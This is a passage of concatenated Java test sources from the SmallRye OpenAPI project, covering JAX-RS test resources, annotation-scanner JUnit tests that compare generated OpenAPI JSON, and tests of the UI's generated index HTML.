test.io.smallrye.openapi.runtime.scanner.jakarta.POJO.class,
List.class);
testGenericsApplicationWithoutArrayRefs(i);
}
void testGenericsApplicationWithoutArrayRefs(Index i) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(
dynamicConfig(OpenApiConstants.SMALLRYE_ARRAY_REFERENCES_ENABLE,
Boolean.FALSE),
i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.generic-model-types-wo-array-refs.json", result);
}
}
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/Canine.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
public interface Canine {
@Schema(name = "c_name", description = "The name of the canine", maxLength = 50)
public String getName();
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ParameterInBeanFromFieldTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.BeanParam;
import javax.ws.rs.DefaultValue;
import javax.ws.rs.GET;
import javax.ws.rs.Path;
import javax.ws.rs.PathParam;
import javax.ws.rs.Produces;
import javax.ws.rs.core.MediaType;
@Path(value = "/parameter-in-bean-from-field/{id}")
public class ParameterInBeanFromFieldTestResource {
public static class Bean {
@PathParam(value = "id")
@DefaultValue(value = "BEAN")
String id;
}
@BeanParam
private Bean param;
@GET
@Produces(value = MediaType.APPLICATION_JSON)
public Widget get() {
return null;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/MatrixParamsOnResourceMethodArgsTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.validation.constraints.NotNull;
import javax.validation.constraints.Size;
import javax.ws.rs.DefaultValue;
import javax.ws.rs.GET;
import javax.ws.rs.MatrixParam;
import javax.ws.rs.Path;
import javax.ws.rs.PathParam;
import javax.ws.rs.Produces;
import javax.ws.rs.core.MediaType;
@Path(value = "/matrix-params-on-resource-method-args/{id}")
@SuppressWarnings(value = "unused")
public class MatrixParamsOnResourceMethodArgsTestResource {
@PathParam(value = "id")
@NotNull
@Size(max = 10)
String id;
@GET
@Path(value = "/anotherpathsegment/reloaded/")
@Produces(value = MediaType.APPLICATION_JSON)
public Widget get(@MatrixParam(value = "m1") @DefaultValue(value = "default-m1") String m1,
@MatrixParam(value = "m2") @Size(min = 20) String m2) {
return null;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/Sub1TestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import java.util.Map;
import jakarta.ws.rs.Consumes;
import jakarta.ws.rs.GET;
import jakarta.ws.rs.PATCH;
import jakarta.ws.rs.POST;
import jakarta.ws.rs.Path;
import jakarta.ws.rs.QueryParam;
import jakarta.ws.rs.core.MediaType;
@SuppressWarnings(value = "unused")
public class Sub1TestResource<T> {
@QueryParam(value = "q2")
T q2;
@GET
public String get(@QueryParam(value = "q3") String q3) {
return null;
}
@PATCH
@Consumes(value = MediaType.TEXT_PLAIN)
public void update(String value) {
return;
}
@POST
@Consumes(value = MediaType.APPLICATION_JSON)
public void create(Map<String, CharSequence> attributes) {
return;
}
@Path(value = "/sub2")
public Sub2TestResource<T> getSub2() {
return new Sub2TestResource<T>();
}
}
<|start_filename|>extension-jaxrs/src/test/java/io/smallrye/openapi/runtime/scanner/ResourceParameterTests.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner;
import java.io.IOException;
import java.time.LocalTime;
import java.time.OffsetTime;
import java.util.HashMap;
import java.util.Set;
import org.eclipse.microprofile.openapi.models.OpenAPI;
import org.jboss.jandex.Index;
import org.jboss.jandex.IndexView;
import org.json.JSONException;
import org.junit.jupiter.api.Test;
import io.smallrye.openapi.api.OpenApiConfig;
import io.smallrye.openapi.api.constants.OpenApiConstants;
/**
* @author <NAME> {@literal <<EMAIL>>}
*/
class ResourceParameterTests extends JaxRsDataObjectScannerTestBase {
/*
* Test case derived from original example in SmallRye OpenAPI issue #25.
*
* https://github.com/smallrye/smallrye-open-api/issues/25
*
*/
@Test
void testJavaxParameterResource() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.resources.ParameterResource.class);
testParameterResource(i);
}
@Test
void testJakartaParameterResource() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.resources.jakarta.ParameterResource.class);
testParameterResource(i);
}
void testParameterResource(Index i) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(dynamicConfig(new HashMap<String, Object>()), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.parameters.simpleSchema.json", result);
}
/*
* Test case derived from original example in SmallRye OpenAPI issue #165.
*
* https://github.com/smallrye/smallrye-open-api/issues/165
*
*/
@Test
void testJavaxPrimitiveArraySchema() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.PrimitiveArraySchemaTestResource.class,
test.io.smallrye.openapi.runtime.scanner.PrimitiveArraySchemaTestResource.PrimitiveArrayTestObject.class);
testPrimitiveArraySchema(i);
}
@Test
void testJakartaPrimitiveArraySchema() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.PrimitiveArraySchemaTestResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.PrimitiveArraySchemaTestResource.PrimitiveArrayTestObject.class);
testPrimitiveArraySchema(i);
}
void testPrimitiveArraySchema(Index i) throws IOException, JSONException {
OpenApiConfig config = emptyConfig();
IndexView filtered = new FilteredIndexView(i, config);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(config, filtered);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.parameters.primitive-array-schema.json", result);
}
@Test
void testJavaxPrimitiveArrayParameter() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.PrimitiveArrayParameterTestResource.class);
testPrimitiveArrayParameter(i);
}
@Test
void testJakartaPrimitiveArrayParameter() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.PrimitiveArrayParameterTestResource.class);
testPrimitiveArrayParameter(i);
}
void testPrimitiveArrayParameter(Index i) throws IOException, JSONException {
OpenApiConfig config = emptyConfig();
IndexView filtered = new FilteredIndexView(i, config);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(config, filtered);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.parameters.primitive-array-param.json", result);
}
@Test
void testJavaxPrimitiveArrayPolymorphism() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.PrimitiveArrayPolymorphismTestResource.class);
testPrimitiveArrayPolymorphism(i);
}
@Test
void testJakartaPrimitiveArrayPolymorphism() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.PrimitiveArrayPolymorphismTestResource.class);
testPrimitiveArrayPolymorphism(i);
}
void testPrimitiveArrayPolymorphism(Index i) throws IOException, JSONException {
OpenApiConfig config = emptyConfig();
IndexView filtered = new FilteredIndexView(i, config);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(config, filtered);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.parameters.primitive-array-polymorphism.json", result);
}
/*
* Test case derived from original example in SmallRye OpenAPI issue #201.
*
* https://github.com/smallrye/smallrye-open-api/issues/201
*
*/
@Test
void testJavaxSchemaImplementationType() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.SchemaImplementationTypeResource.class,
test.io.smallrye.openapi.runtime.scanner.SchemaImplementationTypeResource.GreetingMessage.class,
test.io.smallrye.openapi.runtime.scanner.SchemaImplementationTypeResource.SimpleString.class);
testSchemaImplementationType(i);
}
@Test
void testJakartaSchemaImplementationType() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.SchemaImplementationTypeResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.SchemaImplementationTypeResource.GreetingMessage.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.SchemaImplementationTypeResource.SimpleString.class);
testSchemaImplementationType(i);
}
void testSchemaImplementationType(Index i) throws IOException, JSONException {
OpenApiConfig config = emptyConfig();
IndexView filtered = new FilteredIndexView(i, config);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(config, filtered);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.parameters.string-implementation-wrapped.json", result);
}
/*
* Test case derived for SmallRye OpenAPI issue #233.
*
* https://github.com/smallrye/smallrye-open-api/issues/233
*
*/
@Test
void testJavaxTimeResource() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.TimeTestResource.class,
test.io.smallrye.openapi.runtime.scanner.TimeTestResource.UTC.class, LocalTime.class, OffsetTime.class);
testTimeResource(i);
}
@Test
void testJakartaTimeResource() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.TimeTestResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.TimeTestResource.UTC.class, LocalTime.class, OffsetTime.class);
testTimeResource(i);
}
void testTimeResource(Index i) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(dynamicConfig(new HashMap<String, Object>()), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.parameters.time.json", result);
}
/*
* Test case derived from original example in SmallRye OpenAPI issue #237.
*
* https://github.com/smallrye/smallrye-open-api/issues/237
*
*/
@Test
void testJavaxTypeVariableResponse() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.TypeVariableResponseTestResource.class,
test.io.smallrye.openapi.runtime.scanner.TypeVariableResponseTestResource.Dto.class);
testTypeVariableResponse(i);
}
@Test
void testJakartaTypeVariableResponse() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.TypeVariableResponseTestResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.TypeVariableResponseTestResource.Dto.class);
testTypeVariableResponse(i);
}
void testTypeVariableResponse(Index i) throws IOException, JSONException {
OpenApiConfig config = emptyConfig();
IndexView filtered = new FilteredIndexView(i, config);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(config, filtered);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.parameters.type-variable.json", result);
}
/*
* Test case derived from original example in SmallRye OpenAPI issue #248.
*
* https://github.com/smallrye/smallrye-open-api/issues/248
*
*/
@Test
void testJavaxResponseTypeUnindexed() throws IOException, JSONException {
// Index is intentionally missing ResponseTypeUnindexedTestResource$ThirdPartyType
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.ResponseTypeUnindexedTestResource.class);
testResponseTypeUnindexed(i);
}
@Test
void testJakartaResponseTypeUnindexed() throws IOException, JSONException {
// Index is intentionally missing ResponseTypeUnindexedTestResource$ThirdPartyType
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.ResponseTypeUnindexedTestResource.class);
testResponseTypeUnindexed(i);
}
void testResponseTypeUnindexed(Index i) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("responses.unknown-type.empty-schema.json", result);
}
/*
* Test cases derived from original example in SmallRye OpenAPI issue #260.
*
* https://github.com/smallrye/smallrye-open-api/issues/260
*
*/
@Test
void testJavaxGenericSetResponseWithSetIndexed() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.FruitResource.class,
test.io.smallrye.openapi.runtime.scanner.Fruit.class, test.io.smallrye.openapi.runtime.scanner.Seed.class,
Set.class);
testGenericSetResponseWithSetIndexed(i);
}
@Test
void testJakartaGenericSetResponseWithSetIndexed() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.FruitResource.class,
test.io.smallrye.openapi.runtime.scanner.Fruit.class,
test.io.smallrye.openapi.runtime.scanner.Seed.class,
Set.class);
testGenericSetResponseWithSetIndexed(i);
}
void testGenericSetResponseWithSetIndexed(Index i) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("responses.generic-collection.set-indexed.json", result);
}
@Test
void testJavaxGenericSetResponseWithSetIndexedWithoutArrayRefs() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.FruitResource.class,
test.io.smallrye.openapi.runtime.scanner.Fruit.class,
test.io.smallrye.openapi.runtime.scanner.Seed.class,
Set.class);
testGenericSetResponseWithSetIndexedWithoutArrayRefs(i);
}
@Test
void testJakartaGenericSetResponseWithSetIndexedWithoutArrayRefs() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.FruitResource.class,
test.io.smallrye.openapi.runtime.scanner.Fruit.class,
test.io.smallrye.openapi.runtime.scanner.Seed.class,
Set.class);
testGenericSetResponseWithSetIndexedWithoutArrayRefs(i);
}
void testGenericSetResponseWithSetIndexedWithoutArrayRefs(Index i) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(
dynamicConfig(OpenApiConstants.SMALLRYE_ARRAY_REFERENCES_ENABLE,
Boolean.FALSE),
i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("responses.generic-collection.set-indexed-wo-array-refs.json", result);
}
@Test
void testJavaxGenericSetResponseWithSetUnindexed() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.FruitResource.class,
test.io.smallrye.openapi.runtime.scanner.Fruit.class,
test.io.smallrye.openapi.runtime.scanner.Seed.class);
testGenericSetResponseWithSetUnindexed(i);
}
@Test
void testJakartaGenericSetResponseWithSetUnindexed() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.FruitResource.class,
test.io.smallrye.openapi.runtime.scanner.Fruit.class,
test.io.smallrye.openapi.runtime.scanner.Seed.class);
testGenericSetResponseWithSetUnindexed(i);
}
void testGenericSetResponseWithSetUnindexed(Index i) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("responses.generic-collection.set-unindexed.json", result);
}
/*
* Test case derived from original example in SmallRye OpenAPI issue #239.
*
* https://github.com/smallrye/smallrye-open-api/issues/239
*
*/
@Test
void testJavaxBeanParamMultipartFormInheritance() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.BeanParamMultipartFormInheritanceResource.class,
test.io.smallrye.openapi.runtime.scanner.MultipartFormVerify.class,
test.io.smallrye.openapi.runtime.scanner.MultipartFormUploadIconForm.class,
test.io.smallrye.openapi.runtime.scanner.BeanParamBase.class,
test.io.smallrye.openapi.runtime.scanner.BeanParamImpl.class,
test.io.smallrye.openapi.runtime.scanner.BeanParamAddon.class);
testBeanParamMultipartFormInheritance(i);
}
@Test
void testJakartaBeanParamMultipartFormInheritance() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.BeanParamMultipartFormInheritanceResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.MultipartFormVerify.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.MultipartFormUploadIconForm.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.BeanParamBase.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.BeanParamImpl.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.BeanParamAddon.class);
testBeanParamMultipartFormInheritance(i);
}
void testBeanParamMultipartFormInheritance(Index i) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("params.beanparam-multipartform-inherited.json", result);
}
/*
* Test case derived from original example in SmallRye OpenAPI issue #330.
*
* https://github.com/smallrye/smallrye-open-api/issues/330
*
*/
@Test
void testJavaxMethodTargetParametersWithoutJAXRS() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.MethodTargetParametersResource.class,
test.io.smallrye.openapi.runtime.scanner.MethodTargetParametersResource.PagedResponse.class);
testMethodTargetParametersWithoutJAXRS(i);
}
@Test
void testJakartaMethodTargetParametersWithoutJAXRS() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.MethodTargetParametersResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.MethodTargetParametersResource.PagedResponse.class);
testMethodTargetParametersWithoutJAXRS(i);
}
void testMethodTargetParametersWithoutJAXRS(Index i) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("params.method-target-nojaxrs.json", result);
}
/*
* Test case derived from original example in SmallRye OpenAPI issue #437.
*
* https://github.com/smallrye/smallrye-open-api/issues/437
*
*/
@Test
void testJavaxJsonbTransientOnSetterGeneratesReadOnly() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.Policy437Resource.class,
test.io.smallrye.openapi.runtime.scanner.Policy437.class);
testJsonbTransientOnSetterGeneratesReadOnly(i);
}
@Test
void testJakartaJsonbTransientOnSetterGeneratesReadOnly() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.Policy437Resource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Policy437.class);
testJsonbTransientOnSetterGeneratesReadOnly(i);
}
void testJsonbTransientOnSetterGeneratesReadOnly(Index i) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("responses.hidden-setter-readonly-props.json", result);
}
}
<|start_filename|>extension-jaxrs/src/test/java/io/smallrye/openapi/runtime/util/JandexUtilTests.java<|end_filename|>
package io.smallrye.openapi.runtime.util;
import static org.junit.jupiter.api.Assertions.assertEquals;
import java.util.Arrays;
import javax.ws.rs.Path;
import org.eclipse.microprofile.openapi.annotations.media.Content;
import org.eclipse.microprofile.openapi.annotations.responses.APIResponse;
import org.eclipse.microprofile.openapi.models.media.Encoding;
import org.jboss.jandex.AnnotationInstance;
import org.jboss.jandex.AnnotationValue;
import org.jboss.jandex.ClassInfo;
import org.jboss.jandex.DotName;
import org.jboss.jandex.Index;
import org.junit.jupiter.api.Test;
import io.smallrye.openapi.runtime.scanner.IndexScannerTestBase;
import io.smallrye.openapi.runtime.util.JandexUtil.RefType;
class JandexUtilTests {
@Test
void testEnumValue() {
Index index = IndexScannerTestBase.indexOf(Implementor2.class);
ClassInfo clazz = index.getClassByName(DotName.createSimple(Implementor2.class.getName()));
AnnotationInstance annotation = clazz.method("getData")
.annotation(DotName.createSimple(APIResponse.class.getName()))
.value("content")
.asNestedArray()[0]
.value("encoding")
.asNestedArray()[0];
Encoding.Style style = JandexUtil.enumValue(annotation, "style", Encoding.Style.class);
assertEquals(Encoding.Style.PIPE_DELIMITED, style);
}
@Test
void testRefValueWithHttpUrl() {
String ref = "https://www.example.com/openapi";
AnnotationInstance annotation = AnnotationInstance.create(DotName.createSimple(""),
null,
Arrays.asList(AnnotationValue.createStringValue("ref", ref)));
String outRef = JandexUtil.refValue(annotation, RefType.LINK);
assertEquals(ref, outRef);
}
@Test
void testRefValueWithRelativeUrl() {
String ref = "./additional-schemas.json";
AnnotationInstance annotation = AnnotationInstance.create(DotName.createSimple(""),
null,
Arrays.asList(AnnotationValue.createStringValue("ref", ref)));
String outRef = JandexUtil.refValue(annotation, RefType.LINK);
assertEquals(ref, outRef);
}
@Test
void testRefValueWithValidLinkName() {
String ref = "L1nk.T0_Something-Useful";
AnnotationInstance annotation = AnnotationInstance.create(DotName.createSimple(""),
null,
Arrays.asList(AnnotationValue.createStringValue("ref", ref)));
String outRef = JandexUtil.refValue(annotation, RefType.LINK);
assertEquals("#/components/links/L1nk.T0_Something-Useful", outRef);
}
// TODO: Consider re-implementing this test.
// @Test
// void testGetJaxRsResourceClasses() {
// Index index = IndexScannerTestBase.indexOf(I1.class, I2.class, Implementor1.class, Implementor2.class);
// Collection<ClassInfo> resources = JandexUtil.getJaxRsResourceClasses(index);
// assertEquals(3, resources.size());
// assertTrue(resources.contains(index.getClassByName(DotName.createSimple(I2.class.getName()))));
// assertTrue(resources.contains(index.getClassByName(DotName.createSimple(Implementor1.class.getName()))));
// assertTrue(resources.contains(index.getClassByName(DotName.createSimple(Implementor2.class.getName()))));
// }
@Path("interface1")
interface I1 {
@Path("method1")
public String getData();
}
@Path("interface2")
interface I2 {
@Path("method1")
public String getData();
}
@Path("implementation1")
static abstract class Implementor1 implements I1 {
}
@Path("implementation2")
static class Implementor2 implements I2 {
@Override
@APIResponse(content = @Content(encoding = @org.eclipse.microprofile.openapi.annotations.media.Encoding(style = "pipeDelimited")))
public String getData() {
return null;
}
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ResponseMultipartGenerationTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.Consumes;
import javax.ws.rs.GET;
import javax.ws.rs.Path;
import javax.ws.rs.Produces;
import javax.ws.rs.core.MediaType;
import org.eclipse.microprofile.openapi.annotations.responses.APIResponse;
import org.jboss.resteasy.plugins.providers.multipart.MultipartOutput;
@Path(value = "pets")
public class ResponseMultipartGenerationTestResource {
@GET
@Consumes(value = MediaType.APPLICATION_JSON)
@Produces(value = "multipart/mixed")
@APIResponse(responseCode = "200")
@APIResponse(responseCode = "400", description = "Description 400")
public MultipartOutput getPetWithPicture() {
return null;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/PathParamWithFormParamsTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.validation.constraints.NotNull;
import javax.validation.constraints.Size;
import javax.ws.rs.Consumes;
import javax.ws.rs.DefaultValue;
import javax.ws.rs.FormParam;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.PathParam;
import javax.ws.rs.Produces;
import javax.ws.rs.core.MediaType;
@Path(value = "/path-param-with-form-params/{id}")
@SuppressWarnings(value = "unused")
public class PathParamWithFormParamsTestResource {
@PathParam(value = "id")
@DefaultValue(value = "12345")
@NotNull
@Size(min = 1, max = 12)
String id;
@FormParam(value = "form-param1")
private String formParam1;
@POST
@Consumes(value = MediaType.APPLICATION_FORM_URLENCODED)
@Produces(value = MediaType.APPLICATION_JSON)
public Widget update(@FormParam(value = "form-param2") @Size(max = 10) String formParam2,
@FormParam(value = "qualifiers") java.util.SortedSet<String> qualifiers) {
return null;
}
}
<|start_filename|>core/src/test/java/io/smallrye/openapi/runtime/scanner/sorttest1/package-info.java<|end_filename|>
@OpenAPIDefinition(info = @Info(title = "Test", version = "1.0"), tags = {}, components = @Components(callbacks = {
@Callback(name = "DEF"),
@Callback(name = "XYZ"),
@Callback(name = "ABC")
}, examples = {
@ExampleObject(name = "DEF"),
@ExampleObject(name = "XYZ"),
@ExampleObject(name = "ABC")
}, headers = {
@Header(name = "DEF"),
@Header(name = "XYZ"),
@Header(name = "ABC")
}, links = {
@Link(name = "DEF"),
@Link(name = "XYZ"),
@Link(name = "ABC")
}, parameters = {
@Parameter(name = "DEF"),
@Parameter(name = "XYZ"),
@Parameter(name = "ABC")
}, requestBodies = {
@RequestBody(name = "DEF"),
@RequestBody(name = "XYZ"),
@RequestBody(name = "ABC")
}, responses = {
@APIResponse(name = "DEF"),
@APIResponse(name = "XYZ"),
@APIResponse(name = "ABC")
}, schemas = {
@Schema(name = "DEF"),
@Schema(name = "XYZ"),
@Schema(name = "ABC")
}, securitySchemes = {
@SecurityScheme(securitySchemeName = "DEF"),
@SecurityScheme(securitySchemeName = "XYZ"),
@SecurityScheme(securitySchemeName = "ABC")
}))
package io.smallrye.openapi.runtime.scanner.sorttest1;
import org.eclipse.microprofile.openapi.annotations.Components;
import org.eclipse.microprofile.openapi.annotations.OpenAPIDefinition;
import org.eclipse.microprofile.openapi.annotations.callbacks.Callback;
import org.eclipse.microprofile.openapi.annotations.headers.Header;
import org.eclipse.microprofile.openapi.annotations.info.Info;
import org.eclipse.microprofile.openapi.annotations.links.Link;
import org.eclipse.microprofile.openapi.annotations.media.ExampleObject;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
import org.eclipse.microprofile.openapi.annotations.parameters.Parameter;
import org.eclipse.microprofile.openapi.annotations.parameters.RequestBody;
import org.eclipse.microprofile.openapi.annotations.responses.APIResponse;
import org.eclipse.microprofile.openapi.annotations.security.SecurityScheme;
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/KingCrimsonResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import java.util.ArrayList;
import java.util.List;
import javax.ws.rs.Consumes;
import javax.ws.rs.DELETE;
import javax.ws.rs.GET;
import javax.ws.rs.POST;
import javax.ws.rs.PUT;
import javax.ws.rs.Path;
import javax.ws.rs.Produces;
import javax.ws.rs.QueryParam;
import javax.ws.rs.core.MediaType;
import javax.ws.rs.core.Response;
import org.eclipse.microprofile.openapi.annotations.media.Content;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
import org.eclipse.microprofile.openapi.annotations.parameters.RequestBody;
@Path(value = "/v1/kingcrimson")
@Produces(value = MediaType.APPLICATION_JSON)
@Consumes(value = MediaType.APPLICATION_JSON)
public class KingCrimsonResource extends BaseResource<KingCrimson> {
@GET
public ResultList<KingCrimson> getAll(@QueryParam(value = "id") String id, @QueryParam(value = "limit") int limit,
@QueryParam(value = "offset") int offset, @QueryParam(value = "orderby") List<String> orderBy) {
return super.getAll1();
}
@GET
@Path(value = "/noooooooo")
public Result<List<POJO>> getList() {
return new Result.ResultBuilder<List<POJO>>().status(200).result(new ArrayList<>()).build();
}
@POST
@RequestBody(content = @Content(schema = @Schema(implementation = KingCrimson.class)))
public Result<KingCrimson> post(KingCrimson deployment) {
return super.post1(deployment);
}
@PUT
@RequestBody(content = @Content(schema = @Schema(implementation = KingCrimson.class)))
public Result<KingCrimson> put(KingCrimson deployment) {
return super.put1(deployment);
}
@DELETE
@RequestBody(content = @Content(schema = @Schema(implementation = KingCrimson.class)))
public Response delete(KingCrimson deployment) {
return super.delete1(deployment);
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/NoRolesResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import jakarta.annotation.security.RolesAllowed;
import jakarta.ws.rs.GET;
import jakarta.ws.rs.Path;
import jakarta.ws.rs.Produces;
import jakarta.ws.rs.core.Response;
@Path(value = "/v1")
@SuppressWarnings(value = "unused")
public class NoRolesResource {
@GET
@Path(value = "secured")
@Produces(value = "application/json")
@RolesAllowed(value = { "admin" })
public Response getSecuredData(int id) {
return null;
}
}
<|start_filename|>ui/open-api-ui/src/test/java/io/smallrye/openapi/ui/IndexCreatorTest.java<|end_filename|>
package io.smallrye.openapi.ui;
import static org.junit.jupiter.api.Assertions.assertFalse;
import static org.junit.jupiter.api.Assertions.assertNotNull;
import static org.junit.jupiter.api.Assertions.assertTrue;
import java.io.IOException;
import java.util.HashMap;
import java.util.Map;
import org.junit.jupiter.api.Test;
/**
* Check that the html gets created correctly
*
* @author <NAME> (<EMAIL>)
*/
class IndexCreatorTest {
@Test
void testCreateDefault() throws IOException {
byte[] indexHtml = IndexHtmlCreator.createIndexHtml();
assertNotNull(indexHtml);
String s = new String(indexHtml);
assertTrue(s.contains("<title>SmallRye OpenAPI UI</title>"));
assertTrue(s.contains("<link rel=\"stylesheet\" type=\"text/css\" href=\"theme-feeling-blue.css\" >"));
assertTrue(s.contains("<link rel=\"stylesheet\" type=\"text/css\" href=\"style.css\" >"));
assertTrue(s.contains("url: '/openapi',"));
assertTrue(s.contains("<img src='logo.png' alt='SmallRye OpenAPI UI'"));
assertTrue(s.contains("dom_id: '#swagger-ui',"));
assertTrue(s.contains("deepLinking: true,"));
}
@Test
void testCreateVanilla() throws IOException {
Map<Option, String> options = new HashMap<>();
options.put(Option.logoHref, null);
options.put(Option.themeHref, null);
byte[] indexHtml = IndexHtmlCreator.createIndexHtml(options);
assertNotNull(indexHtml);
String s = new String(indexHtml);
assertTrue(s.contains("<title>SmallRye OpenAPI UI</title>"));
assertFalse(s.contains("<link rel=\"stylesheet\" type=\"text/css\" href=\"theme-feeling-blue.css\" >"));
assertTrue(s.contains("<link rel=\"stylesheet\" type=\"text/css\" href=\"style.css\" >"));
assertTrue(s.contains("url: '/openapi',"));
assertFalse(s.contains("<img src='logo.png' alt='SmallRye OpenAPI UI'"));
assertTrue(s.contains("dom_id: '#swagger-ui',"));
assertTrue(s.contains("deepLinking: true,"));
}
@Test
void testCreateWithStringBooleanOption() throws IOException {
Map<Option, String> options = new HashMap<>();
options.put(Option.syntaxHighlight, "false");
options.put(Option.filter, "bla");
byte[] indexHtml = IndexHtmlCreator.createIndexHtml(options);
assertNotNull(indexHtml);
String s = new String(indexHtml);
assertTrue(s.contains("<title>SmallRye OpenAPI UI</title>"));
assertTrue(s.contains("<link rel=\"stylesheet\" type=\"text/css\" href=\"theme-feeling-blue.css\" >"));
